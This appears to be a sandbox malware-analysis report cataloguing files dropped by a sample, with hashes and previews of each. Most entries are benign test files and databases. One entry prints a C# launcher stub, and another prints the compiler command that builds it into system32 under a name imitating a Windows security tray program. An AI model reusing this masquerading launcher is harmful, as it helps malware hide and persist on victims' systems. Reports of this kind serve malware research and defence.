SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2ommkhu.mnd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyodzhzg.hpm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3mmvjv4.c1s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgvkuniq.1uc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkhiygk1.ewq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzdieejh.etw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgvuy5pw.qbm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmhg5idz.zbi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrqxgrt4.dfg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qroon344.nl5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcmdqfj0.kd1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjtw0w0o.bwm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v52fqnly.z5m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhktyqbg.djx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnlbyije.ji4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xf5pxaj1.4jz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xldlphui.u0r.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyuonfcu.khd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yohguhzm.njz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyyltxx2.kzv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\cOaYo9GFgs

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.5638561897747225
Encrypted:	false
SSDEEP:	3:mvpEBfmtn:mvp4Yn
MD5:	E22310A00670042E774BB2E7DEB51EDE
SHA1:	CEB9DE98E843315F8D61816EBAF87AADF361DA03
SHA-256:	20602C2D77A99962F797114640B9FF31873FC8BBB0F810650A3C7F73408F304F
SHA-512:	7831C85903AECBBE53577AA460417978927427B1753B4453A54AAE10AE85DEA7C3D5EFA38FBD6BA61D4CDCCD6CDF70CF1C92DC3E47D462EE72AB477BC5368895
Malicious:	false
Preview:	4FyjMSBrfLicR1dkQYJNgcTmu

C:\Users\user\AppData\Local\Temp\j11z8HEtiF

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.0.cs

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	385
Entropy (8bit):	5.027799661719317
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKintiFkD:JNVQIbSfhV7TiFkMSfhmFkD
MD5:	348A88B432A63ED21C38A176C3F6F4D4
SHA1:	7FB100A065BA85B7BFD87ED2977CF69D784D5539
SHA-256:	C313BCFD59521B83871D8518A06891C9B430F1A155B5B9A3B091E372B73D0684
SHA-512:	7998449B4EE7C1E3A1EF3853D8EC291D5A5BE3C4C4D2893809A5DD7C0DDB7042A549DB337BC2921BA0DB3BC78C021EAFBEA52BC2B512688411E66E86AF4C754A
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.061992733475265
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fmnW5yWdBH:Hu7L//TRq79cQWfen12
MD5:	81DA2E8BB4B9E8B0205F50D68718C614
SHA1:	1945A5F3BA454E55CC6FCEF5B3DE0941707968FB
SHA-256:	1D39C76C1554F3E26856204A8AA9340F993227253C77F933220B61443828B689
SHA-512:	59E7708D5E525D9959CBBDCAC99240E42B94B50C581C335A1CB810A007BD7FEEB250D691D7580E633F8682CABCB83CD45F9844FA40A6BD887E245394E769F592
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.0.cs"

C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.out

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
Category:	modified
Size (bytes):	750
Entropy (8bit):	5.250412358160811
Encrypted:	false
SSDEEP:	12:KJN/I/u7L//TRq79cQWfen13KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfen13Kax5DqBVKVrdV
MD5:	16574A32637BF7E8F04A5A85DD649301
SHA1:	87C30F2B86F66F432B4CCBC41DA3C661EDCB56FF
SHA-256:	A7D0074DBB5FB00E12E1AA8ED4FAF1619D668B9A08C9445945BB0FC7B2AAF118
SHA-512:	E2DECA898E618BA54791C879079886470DA793006FFCB86598023220A335F4BE99B90C5DEEC7BFE143220542DD715CCD43B45906908165A053B3D6B4536AFE56
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\pka9ORyMub

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zh8jl3GBV1

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zrcWvh8nNU

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\5940a34987c991

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with very long lines (725), with no line terminators
Category:	dropped
Size (bytes):	725
Entropy (8bit):	5.892072700916003
Encrypted:	false
SSDEEP:	12:Q7jJVmhSzUetT9OI9ZQdimPUAsLJRmjPIjielxQMma9xseL02zb0R1Zgts5JDmT8:wjyRenFZQdpUAsLfOPIufMma9WDA0/sW
MD5:	BEB60601E4162F7E8DF1EF3048832BE5
SHA1:	EE37718D2D78B14C82F0F266FF9B2509009B8DF8
SHA-256:	22AFCA2A067AFA4941C744F3BBB2616FC8DD435BFBBA5779C70385EE2B778771
SHA-512:	E143425E28CEC0B43CE9EDE76F955632EDE016FA05DBED5A522DE00798A41382876B6D71746E81DB7E9C79E5CF7AEE74AE2DBF7363D4576BF63B0AF53809BAC5
Malicious:	false
Preview:	EpqLLYGt8MXZ4BMZCB6bO6IY1FUGFTmtS3Q4zFIG7OpRhFCIzvrYrIeHhRTGEAnpjoGAuSk730e9Q01wCLQUlOBKZJXivBC7kAs38BYhKue1oe0qahD3uTDVm6lk5BM1ygZQI7xBwtJ0tKg4SqIN8JNR6WQBZymJhmDHFkictBGBJMlcaqRP393oTITvqwl8GASGHYzsHpd6CMHtvyltgXPitYx6Qwv7aI4I3eVB1iHNf6mHAk92K2btuuXsl2cU4fg4R9zRdk17PCDxwp6pw3xiqKYJHmZ8FwT9aszBusYkAdesqk656whAs8NHkpK1K31csDWE055EeMhMqpdgpeBTPSRcesaEihaHlBAmN2FB1dgfaBb5MnLq1iNZw4jHe0f6wakop0TwYAbvwvBdQe25WuPDxkzTT7gB7jtAawQVUYR1HbnB3G197kkCKh1EAAdadaxMCBCeOhk8cY5V7yZMGhDX9qz25LUU40Xqna92DWva9mjwlfHMkRU6XaMVLJjCMQDlAOsgyhItvmXXGDRaEIungbTNOoq3xsOti8vWxlXCIkKuDyOI2I8EfaFj5fSK1P6DYnzIR4ncurf6QiJZZiBotJNI2MbRSML3nGWZ9F18ffUy4JSWV3vTNRTOZqQFcVJhglSJMtZTrDINzZNt3E6Zb1pWxIATzvfKVwRT0JKldbmKIFYAdgMYYuGp66WDtGe5i82DI42t4U6AP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe

Download File

